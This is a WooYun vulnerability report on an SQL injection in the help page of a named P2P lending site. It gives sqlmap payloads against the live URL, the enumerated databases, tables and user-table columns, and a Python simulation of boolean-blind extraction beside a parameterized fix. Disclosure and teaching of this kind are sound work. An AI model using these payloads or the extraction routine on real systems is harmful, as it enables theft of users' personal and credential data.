Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0166406

Title: SQL injection in the P2P lending platform 助商贷 (leaks user data)

Vendor: 助商贷

Author: Nelion

Submitted: 2016-01-01 23:56

Fix time: 2016-02-12 18:49

Published: 2016-02-12 18:49

Type: SQL injection

Severity: Low

Self-assessed rank: 5

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2016-01-01: vendor contacted, waiting for the vendor to claim the report; details withheld from the public
2016-02-12: the vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

SQL injection in the P2P lending platform 助商贷 (leaks user data). The database connection runs as root, and user data is exposed.

Details:

助商贷 is a P2P online lending platform run by 四川宇登投资咨询有限公司 (Sichuan Yudeng Investment Consulting Co., Ltd.), which describes itself as safe, efficient, professional and standardised: its business is not limited by geography, the procedures are simple, the investment threshold is low, and it claims to help small and micro enterprises with financing while letting investors with idle funds preserve and grow their wealth. (Official site description)
1. Injection point:

http://www.scyd360.com/help.php?mod=list&cateid=4


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cateid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: mod=list&cateid=4 AND 5202=5202

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: mod=list&cateid=4 AND (SELECT 3295 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(3295=3295,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: mod=list&cateid=4 AND (SELECT * FROM (SELECT(SLEEP(5)))ZnXj)

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: mod=list&cateid=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x465a4c7a58596e6e5a46,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[14:42:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[14:42:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.17
back-end DBMS: MySQL 5.0

Proof:

2. Current user and privileges:

(screenshot: 用户及权限.png)


3. All databases:

available databases [4]:
[*] information_schema
[*] mysql
[*] scyd
[*] test


4. The current database is scyd; its tables and row counts:

Database: scyd
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| scyd_caiwu_mingxi | 94713 |
| scyd_emali_list | 82905 |
| pre_common_district | 45051 |
| scyd_rcharge | 24993 |
| scyd_earnings_clear | 24321 |
| scyd_log | 19235 |
| scyd_order | 17047 |
| scyd_emali_setting | 14785 |
| scyd_product_img | 8654 |
| scyd_jlset | 7241 |
| scyd_record | 3227 |
| scyd_personal_account | 2959 |
| scyd_user | 2959 |
| scyd_user_security | 2959 |
| scyd_kqer_tc | 2927 |
| scyd_reward_details | 2761 |
| scyd_repayment_records | 2140 |
| scyd_rongzhi_num | 1813 |
| scyd_bank | 1523 |
| pre_common_member_count | 1171 |
| pre_common_member_field_forum | 1171 |
| pre_common_member_field_home | 1171 |
| pre_common_member_profile | 1171 |
| pre_common_member_status | 1171 |
| pre_ucenter_memberfields | 1171 |
| pre_ucenter_members | 1171 |
| pre_common_member | 1170 |
| scyd_product | 987 |
| scyd_product_user_info | 987 |
| scyd_info | 651 |
| pre_common_setting | 421 |
| pre_forum_statlog | 349 |
| scyd_reward_dolist | 349 |
| pre_common_credit_rule_log | 312 |
| scyd_ylxq | 210 |
| scyd_auto_buy | 181 |
| scyd_daysnum | 174 |
| scyd_rongzhi | 138 |
| pre_common_syscache | 106 |
| mall_orders | 104 |
| pre_common_block_style | 103 |
| mz_jigou_ren | 92 |
| scyd_nav | 83 |
| scyd_record05 | 82 |
| pre_common_smiley | 75 |
| pre_common_admincp_perm | 67 |
| pre_common_nav | 55 |
| pre_common_member_profile_setting | 51 |
| pre_common_stylevar | 45 |
| scyd_email_code | 45 |
| pre_forum_forumfield | 41 |
| pre_forum_forum | 40 |
| mall_items | 35 |
| pre_common_stat | 33 |
| pre_common_credit_rule | 31 |
| pre_ucenter_settings | 27 |
| pre_common_onlinetime | 25 |
| pre_common_cron | 20 |
| pre_common_usergroup | 20 |
| pre_common_usergroup_field | 20 |
| scyd_inter_money | 18 |
| pre_home_click | 15 |
| scyd_infocate | 15 |
| scyd_job | 13 |
| pre_common_plugin | 12 |
| scyd_tag | 11 |
| pre_forum_medal | 10 |
| pre_common_session | 9 |
| scyd_admin | 9 |
| scyd_productcate | 8 |
| pre_common_admingroup | 7 |
| scyd_activity | 7 |
| scyd_authgroup | 7 |
| scyd_delimitlabel | 7 |
| pre_forum_typeoption | 6 |
| scyd_activity_details | 6 |
| pre_common_admincp_group | 5 |
| pre_common_friendlink | 5 |
| pre_home_notification | 5 |
| scyd_equity_details | 5 |
| scyd_loan_application | 5 |
| pre_forum_bbcode | 4 |
| pre_forum_onlinelist | 4 |
| scyd_jobcate | 4 |
| scyd_onlinechat | 4 |
| scyd_usergroup | 4 |
| pre_common_diy_data | 3 |
| pre_common_member_newprompt | 3 |
| pre_forum_grouplevel | 3 |
| pre_forum_imagetype | 3 |
| scyd_adszone | 3 |
| pre_common_block | 2 |
| pre_common_template_block | 2 |
| pre_common_word_type | 2 |
| pre_forum_access | 2 |
| pre_mobile_setting | 2 |
| pre_ucenter_applications | 2 |
| pre_ucenter_failedlogins | 2 |
| pre_ucenter_pm_members | 2 |
| pre_common_admincp_member | 1 |
| pre_common_admincp_session | 1 |
| pre_common_credit_rule_log_field | 1 |
| pre_common_failedip | 1 |
| pre_common_statuser | 1 |
| pre_common_style | 1 |
| pre_common_template | 1 |
| pre_forum_threadprofile | 1 |
| pre_home_visitor | 1 |
| pre_portal_category | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_notelist | 1 |
| pre_ucenter_pm_indexes | 1 |
| pre_ucenter_pm_lists | 1 |
| pre_ucenter_pm_messages_1 | 1 |
| scyd_config | 1 |
| scyd_page | 1 |
| scyd_pagecate | 1 |
| scyd_skin | 1 |
| scyd_test | 1 |
+-----------------------------------+---------+


5. Some of the columns in the user table scyd_user:

Database: scyd
Table: scyd_user
[33 columns]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| address | varchar(200) |
| brothday | varchar(10) |
| comp_scale | varchar(32) |
| education | varchar(32) |
| email | varchar(200) |
| explam | text |
| flag | smallint(2) |
| forgetpwd | varchar(200) |
| ftgcode | varchar(10) |
| headimg | varchar(200) |
| helpqq | varchar(20) |
| im | varchar(200) |
| induatry | varchar(32) |
| job | varchar(32) |
| lastlogindate | int(11) |
| lastloginip | varchar(100) |
| loginname | varchar(30) |
| marriage | varchar(10) |
| memo | text |
| password | varchar(64) |
| pointnum | int(11) |
| postnums | int(11) |
| realname | varchar(30) |
| regcode | varchar(64) |
| regdate | int(11) |
| salary | varchar(32) |
| salt | varchar(32) |
| sex | int(11) |
| stopdate | int(11) |
| telno | varchar(100) |
| tgcode | varchar(10) |
| usergroupid | int(11) |
| userid | int(11) |
+---------------+--------------+


6. A sample of the data in the telno, email, loginname and password columns:

(screenshot: 用户数据.png)

Fix recommendation:

Filter the parameter: cateid is numeric, so cast or validate it as an integer before it reaches the query, and prefer prepared statements over building the SQL by string concatenation. The application should also not connect to MySQL as root.
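Added example, not code from the WooYun report or from the 助商贷 site: a self-contained simulation of the cateid injection in section 1 (the boolean-based blind payload "4 AND 5202=5202" used as an oracle to pull a value out of scyd_user) placed beside the fix recommended above. An in-memory SQLite database stands in for the site's MySQL database "scyd"; the table and column names (scyd_user, loginname, telno, email) are taken from the report, the assumption that scyd_infocate backs help.php?mod=list is mine, and every row value is constructed. SQLite's UNICODE()/SUBSTR() replace the ORD()/SUBSTRING() that sqlmap would use against MySQL.

```python
# Added example (not from the WooYun report or the 助商贷 code base): simulate the
# help.php?mod=list&cateid=N injection and the recommended fix against a stand-in
# SQLite database. Row values are constructed; table/column names follow the report.
import sqlite3

# Constructed sample rows (fake values, not data from the site).
SAMPLE_CATEGORIES = [(4, "FAQ")]
SAMPLE_USERS = [
    (1, "alice", "alice@example.com", "13800000001"),
    (2, "bob", "bob@example.com", "13800000002"),
]


def make_db():
    """Build the stand-in database. 'scyd_infocate' as the table behind
    help.php?mod=list is an assumption; the report only lists its name."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scyd_infocate (cateid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO scyd_infocate VALUES (?, ?)", SAMPLE_CATEGORIES)
    conn.execute(
        "CREATE TABLE scyd_user (userid INTEGER, loginname TEXT, email TEXT, telno TEXT)"
    )
    conn.executemany("INSERT INTO scyd_user VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def help_list_vulnerable(conn, cateid):
    """The bug as sqlmap found it: the raw GET value is concatenated into the SQL."""
    sql = "SELECT name FROM scyd_infocate WHERE cateid=" + cateid
    return conn.execute(sql).fetchall()


def help_list_fixed(conn, cateid):
    """The fix: validate the type (cateid is numeric) and bind it as a parameter.
    Either measure alone stops this injection; doing both is defence in depth."""
    if not cateid.isdigit():
        raise ValueError("cateid must be a non-negative integer")
    return conn.execute(
        "SELECT name FROM scyd_infocate WHERE cateid=?", (int(cateid),)
    ).fetchall()


def fixed_rejects(conn, cateid):
    """True if the hardened handler refuses the value instead of querying with it."""
    try:
        help_list_fixed(conn, cateid)
    except ValueError:
        return True
    return False


def oracle(handler, conn, condition):
    """Boolean oracle in the shape of sqlmap's first payload ('4 AND 5202=5202'):
    the category row is on the page exactly when the injected condition is true."""
    return len(handler(conn, "4 AND " + condition)) > 0


def blind_extract(handler, conn, subquery, max_len=64):
    """Boolean-based blind extraction of one string, one character at a time, with
    a binary search over the code point (about 7 requests per character).
    SQLite's UNICODE()/SUBSTR() stand in for MySQL's ORD()/SUBSTRING()."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "UNICODE(SUBSTR((%s),%d,1))>%d" % (subquery, pos, mid)
            if oracle(handler, conn, cond):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string SUBSTR() yields '' and no comparison is true,
        # so a final equality check tells us when to stop.
        if not oracle(handler, conn, "UNICODE(SUBSTR((%s),%d,1))=%d" % (subquery, pos, lo)):
            break
        result += chr(lo)
    return result


def demo():
    conn = make_db()
    secret = "SELECT loginname || ':' || telno FROM scyd_user WHERE userid=1"
    return {
        "true_condition": help_list_vulnerable(conn, "4 AND 5202=5202"),
        "false_condition": help_list_vulnerable(conn, "4 AND 5202=5203"),
        "leaked": blind_extract(help_list_vulnerable, conn, secret),
        "fixed_normal": help_list_fixed(conn, "4"),
        "fixed_rejects_payload": fixed_rejects(conn, "4 AND 5202=5202"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The oracle only needs the page to differ between a true and a false condition, which is why the single category row is enough to leak any value the database user can read; with the connection running as root, as the report states, that is every database listed in section 3. Running as a dedicated low-privilege MySQL account limits what a future injection can reach but does not fix the bug; the parameter binding in help_list_fixed does.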

Copyright notice: please credit the source when reposting: Nelion@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond.